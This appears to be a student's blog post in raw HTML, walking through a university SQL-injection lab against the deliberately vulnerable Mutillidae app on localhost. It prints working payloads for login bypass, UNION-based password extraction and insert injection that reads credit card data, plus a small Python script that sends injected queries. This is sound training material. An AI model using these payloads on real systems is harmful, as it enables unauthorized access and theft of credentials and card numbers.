<!DOCTYPE html>
<html lang="en">
<head>
	<!--pjax: don't stop the music-->
  <script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.js"></script>
  
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-icon-180x180.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Merriweather:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"rdweirdo981.github.io","root":"/","images":"/images","scheme":"Pisces","version":"8.1.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}};
  </script>
<meta name="description" content="This article is related to FIT5003 2020S2 Lab 9. The main aspects that these labs review are 3 types of SQL injection. We will discuss how to inject each of the vulnerability and how to defend the at">
<meta property="og:type" content="article">
<meta property="og:title" content="FIT5003 SQL Injection">
<meta property="og:url" content="https://rdweirdo981.github.io/2021/01/25/Master%20of%20Cybersecurity/FIT5003/FIT5003%20SQLi/index.html">
<meta property="og:site_name" content="Random Weirdo">
<meta property="og:description" content="This article is related to FIT5003 2020S2 Lab 9. The main aspects that these labs review are 3 types of SQL injection. We will discuss how to inject each of the vulnerability and how to defend the at">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://rdweirdo981.github.io/2021/01/25/Master%20of%20Cybersecurity/FIT5003/FIT5003%20SQLi/1.bmp">
<meta property="og:image" content="https://rdweirdo981.github.io/2021/01/25/Master%20of%20Cybersecurity/FIT5003/FIT5003%20SQLi/2.bmp">
<meta property="og:image" content="https://rdweirdo981.github.io/2021/01/25/Master%20of%20Cybersecurity/FIT5003/FIT5003%20SQLi/3.bmp">
<meta property="og:image" content="https://rdweirdo981.github.io/2021/01/25/Master%20of%20Cybersecurity/FIT5003/FIT5003%20SQLi/4.bmp">
<meta property="article:published_time" content="2021-01-25T14:04:57.000Z">
<meta property="article:modified_time" content="2021-02-07T17:09:48.715Z">
<meta property="article:author" content="Daisy">
<meta property="article:tag" content="SQLi">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="CSRF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rdweirdo981.github.io/2021/01/25/Master%20of%20Cybersecurity/FIT5003/FIT5003%20SQLi/1.bmp">


<link rel="canonical" href="https://rdweirdo981.github.io/2021/01/25/Master%20of%20Cybersecurity/FIT5003/FIT5003%20SQLi/">


<script data-pjax class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>
<title>FIT5003 SQL Injection | Random Weirdo</title>
  



  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>


<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Random Weirdo</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">It from bit.</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
		<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1649082&auto=1&height=66"></iframe>
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <section class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Week-9-Lab-SQL-Injection"><span class="nav-number">1.</span> <span class="nav-text">Week 9 Lab - SQL Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Introduction"><span class="nav-number">1.1.</span> <span class="nav-text">Introduction</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Environment-Setup"><span class="nav-number">1.2.</span> <span class="nav-text">Environment Setup</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Program-Requirements"><span class="nav-number">1.2.1.</span> <span class="nav-text">Program Requirements</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Setup-Web-Server"><span class="nav-number">1.2.2.</span> <span class="nav-text">Setup Web Server</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL-Injection"><span class="nav-number">1.3.</span> <span class="nav-text">SQL Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Bypass-Authentication"><span class="nav-number">1.3.1.</span> <span class="nav-text">Bypass Authentication</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Extract-Data"><span class="nav-number">1.3.2.</span> <span class="nav-text">Extract Data</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Task-1-amp-2-Extract-user-info"><span class="nav-number">1.3.2.1.</span> <span class="nav-text">Task 1 &amp; 2: Extract user info</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Task-3-Other-data"><span class="nav-number">1.3.2.2.</span> <span class="nav-text">Task 3: Other data</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Insert-Data"><span class="nav-number">1.3.3.</span> <span class="nav-text">Insert Data</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Automated-SQL-injections"><span class="nav-number">1.3.4.</span> <span class="nav-text">Automated SQL injections</span></a></li></ol></li></ol></li></ol></div>
        </section>
        <!--/noindex-->

        <section class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Daisy"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Daisy</p>
  <div class="site-description" itemprop="description">Notes about cybersecurity, mathematics, and anything else.</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



        </section>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://rdweirdo981.github.io/2021/01/25/Master%20of%20Cybersecurity/FIT5003/FIT5003%20SQLi/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Daisy">
      <meta itemprop="description" content="Notes about cybersecurity, mathematics, and anything else.">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Random Weirdo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          FIT5003 SQL Injection
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2021-01-25 22:04:57" itemprop="dateCreated datePublished" datetime="2021-01-25T22:04:57+08:00">2021-01-25</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">Edited on</span>
        <time title="Modified: 2021-02-08 01:09:48" itemprop="dateModified" datetime="2021-02-08T01:09:48+08:00">2021-02-08</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Master-of-Cybersecurity/" itemprop="url" rel="index"><span itemprop="name">Master of Cybersecurity</span></a>
        </span>
          , 
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Master-of-Cybersecurity/FIT5003/" itemprop="url" rel="index"><span itemprop="name">FIT5003</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <center> This article is related to FIT5003 2020S2 Lab 9. The main aspects that these labs review are 3 types of SQL injection. We will discuss how to inject each of the vulnerability and how to defend the attacks.</center>


<a id="more"></a>
<br>

<h1 id="Week-9-Lab-SQL-Injection"><a href="#Week-9-Lab-SQL-Injection" class="headerlink" title="Week 9 Lab - SQL Injection"></a>Week 9 Lab - SQL Injection</h1><h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>OWASP SQL Injection: <a target="_blank" rel="noopener" href="https://owasp.org/www-community/attacks/SQL_Injection">https://owasp.org/www-community/attacks/SQL_Injection</a></p>
<p>Reference: Week 9 Lab pdf</p>
<h2 id="Environment-Setup"><a href="#Environment-Setup" class="headerlink" title="Environment Setup"></a>Environment Setup</h2><h3 id="Program-Requirements"><a href="#Program-Requirements" class="headerlink" title="Program Requirements"></a>Program Requirements</h3><ul>
<li><p>OS: <strong>64-bit Ubuntu VM</strong></p>
</li>
<li><p>Server: by <strong>XAMPP</strong> <a target="_blank" rel="noopener" href="http://www.apachefriends.org/index.html">http://www.apachefriends.org/index.html</a></p>
</li>
<li><p>Vulnerable Web App: <strong>Mutillidae</strong> <a target="_blank" rel="noopener" href="https://github.com/webpwnized/mutillidae">https://github.com/webpwnized/mutillidae</a></p>
<ul>
<li><p>copy mutillidae directory (and all subdirectries) into /opt/lampp/htdocs:</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">sudo cp -R ./mutillidae /opt/lampp/htdocs/</span></span><br></pre></td></tr></tbody></table></figure>
</li>
<li><p>Helpful setting:</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">sudo nano /opt/lampp/htdocs/mutillidae/includes/database-config.inc</span></span><br></pre></td></tr></tbody></table></figure>

<p>In the editor, change the configuration as follows:</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">define(’DB_HOST’, ’<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>’);</span><br><span class="line">define(’DB_USERNAME’, ’root’);</span><br><span class="line">define(’DB_PASSWORD’, ’’);</span><br><span class="line">define(’DB_NAME’, ’mutillidae’);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
</li>
</ul>
</li>
<li><p>Web analysis tool: <strong>Burpsuite</strong> <a target="_blank" rel="noopener" href="https://portswigger.net/burp/communitydownload">https://portswigger.net/burp/communitydownload</a></p>
</li>
</ul>
<h3 id="Setup-Web-Server"><a href="#Setup-Web-Server" class="headerlink" title="Setup Web Server"></a>Setup Web Server</h3><p>XAMPP start:</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">sudo /opt/lampp/lampp start</span></span><br></pre></td></tr></tbody></table></figure>

<p>And open Burpsuite to catch the data.</p>
<ul>
<li>set the IP as 127.0.0.1 and the port as 8080</li>
</ul>
<p>Open <a target="_blank" rel="noopener" href="http://127.0.0.1/mutillidae/">http://127.0.0.1/mutillidae/</a></p>
<p><img src="1.bmp"></p>
<h2 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h2><h3 id="Bypass-Authentication"><a href="#Bypass-Authentication" class="headerlink" title="Bypass Authentication"></a>Bypass Authentication</h3><p>Practice version: ‘OWASP 2017’ –&gt;  ‘A1 – Injection (SQL)’ –&gt; ‘SQLi – Bypass Authentication’ –&gt; ‘Login’</p>
<p>Mission: Bypass authentication and login successfully.</p>
<p>Answer code:</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' OR 1=1 <span class="comment">-- </span></span><br></pre></td></tr></tbody></table></figure>

<p>Result:</p>
<p><img src="2.bmp"></p>
<p>Equivalent query:</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> username = <span class="string">''</span> <span class="keyword">OR</span> <span class="number">1</span>=<span class="number">1</span> <span class="comment">-- AND password = ''</span></span><br></pre></td></tr></tbody></table></figure>

<p><strong>Note</strong></p>
<p>There must be a space after –. If there is not, the query will become to:</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> username = <span class="string">''</span> <span class="keyword">OR</span> <span class="number">1</span>=<span class="number">1</span> <span class="comment">--AND password = ''</span></span><br></pre></td></tr></tbody></table></figure>

<p>This will cause a syntax error and the exception will be caught.</p>
<h3 id="Extract-Data"><a href="#Extract-Data" class="headerlink" title="Extract Data"></a>Extract Data</h3><p>Practice version: ‘OWASP 2017’ –&gt;  ‘A1 – Injection (SQL)’ –&gt; ‘SQLi – Extract Data’ –&gt; ‘User Info’</p>
<h4 id="Task-1-amp-2-Extract-user-info"><a href="#Task-1-amp-2-Extract-user-info" class="headerlink" title="Task 1 &amp; 2: Extract user info"></a>Task 1 &amp; 2: Extract user info</h4><p>Mission: Display users’ information</p>
<p>Answer code:</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">John' <span class="comment">--</span></span><br></pre></td></tr></tbody></table></figure>

<p>Result:</p>
<p><img src="3.bmp"></p>
<p>Equivalent query:</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> username = <span class="string">'John'</span> <span class="comment">-- AND password = ''</span></span><br></pre></td></tr></tbody></table></figure>

<p><strong>Note</strong></p>
<p>You can also use the code in Bypass Authentication. The result will be all the users’ information.</p>
<h4 id="Task-3-Other-data"><a href="#Task-3-Other-data" class="headerlink" title="Task 3: Other data"></a>Task 3: Other data</h4><p>Answer code:</p>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">John' UNION SELECT NULL, password, NULL FROM accounts -- </span><br></pre></td></tr></tbody></table></figure>

<p><strong>Note:</strong></p>
<p>This is an unsolved task. I’ll go back to this question once I find how to hack it.</p>
<h3 id="Insert-Data"><a href="#Insert-Data" class="headerlink" title="Insert Data"></a>Insert Data</h3><p>Practice version: ‘OWASP 2017’ –&gt;  ‘A1 – Injection (SQL)’ –&gt; ‘SQLi – Insert Injection’ –&gt; ‘Register’</p>
<p>Mission: Use ‘Register’ page to implement the malicious string and display users’ information on the ‘User info’ page.</p>
<p>Answer code:</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fish','42',(<span class="keyword">select</span> ccnumber <span class="keyword">from</span> credit_cards <span class="keyword">where</span> ccid=<span class="string">"1"</span>)) <span class="comment">-- // For credit card number</span></span><br></pre></td></tr></tbody></table></figure>

<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fish','42',(<span class="keyword">select</span> expiration <span class="keyword">from</span> credit_cards <span class="keyword">where</span> ccid=<span class="string">"1"</span>)) <span class="comment">--  // For expiration</span></span><br></pre></td></tr></tbody></table></figure>

<p>Result:</p>
<p><img src="4.bmp"></p>
<p>Equivalent query:</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">INSERT</span> <span class="keyword">INTO</span> accounts(username, <span class="keyword">password</span>, mysignature) <span class="keyword">VALUES</span>(<span class="string">'Fish'</span>,<span class="string">'42'</span>,(<span class="keyword">select</span> expiration <span class="keyword">from</span> credit_cards <span class="keyword">where</span> ccid=<span class="string">"1"</span>)) <span class="comment">-- ')</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="Automated-SQL-injections"><a href="#Automated-SQL-injections" class="headerlink" title="Automated SQL injections"></a>Automated SQL injections</h3><p>AKA: how to find the vulnerability by using Python code</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">proxies = {’http’:’http://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8080</span>’,’https’:’http://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8080</span>’}</span><br><span class="line"><span class="comment"># {key:value}</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span>():</span></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) != <span class="number">2</span>:</span><br><span class="line">    	<span class="built_in">print</span> (<span class="string">"(+) Usage: %s &lt;sql-query-for-username&gt;"</span> % sys.argv[<span class="number">0</span>])</span><br><span class="line">    	sys.exit(-<span class="number">1</span>)</span><br><span class="line">        </span><br><span class="line">    username = sys.argv[<span class="number">1</span>]</span><br><span class="line">    target=<span class="string">"http://localhost/mutillidae/index.php?page=user-info.php&amp;username={}&amp;password=&amp;user-info-php-submit-button=View+Account+Details"</span>.<span class="built_in">format</span>(username)</span><br><span class="line">    </span><br><span class="line">    r = requests.get(target,proxies=proxies,allow_redirects=<span class="literal">False</span>) </span><br><span class="line">    <span class="comment">#requests.get(url, params={key: value}, args)</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(r.text) &gt; <span class="number">61000</span>:</span><br><span class="line">    	print(<span class="string">"(+) It works!"</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">    	print(<span class="string">"(-) It doesn’t work, try another query"</span>)</span><br><span class="line">        </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">main()</span><br></pre></td></tr></tbody></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQLi/" rel="tag"># SQLi</a>
              <a href="/tags/XSS/" rel="tag"># XSS</a>
              <a href="/tags/CSRF/" rel="tag"># CSRF</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/01/22/Master%20of%20Cybersecurity/FIT5003/FIT5003%20Assignment%202/" rel="prev" title="FIT5003 Assignment 2 - SQLi, XSS, and CSRF in OWASP2017">
                  <i class="fa fa-chevron-left"></i> FIT5003 Assignment 2 - SQLi, XSS, and CSRF in OWASP2017
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>







<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Daisy</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/@next-theme/pjax@0.4.0/pjax.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script><script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '.page-configurations',
    '.main-inner',
    '.post-toc-wrap',
    '.languages',
    '.pjax'
  ],
  analytics: false,
  cacheBust: false,
  scrollRestoration: false,
  scrollTo: !CONFIG.bookmark.enable
});

document.addEventListener('pjax:success', () => {
  pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  const hasTOC = document.querySelector('.post-toc');
  document.querySelector('.sidebar-inner').classList.toggle('sidebar-nav-active', hasTOC);
  document.querySelector(hasTOC ? '.sidebar-nav-toc' : '.sidebar-nav-overview').click();
  NexT.utils.updateSidebarPosition();
});
</script>


  







  




    <div class="pjax">


    </div>
</body>
</html>
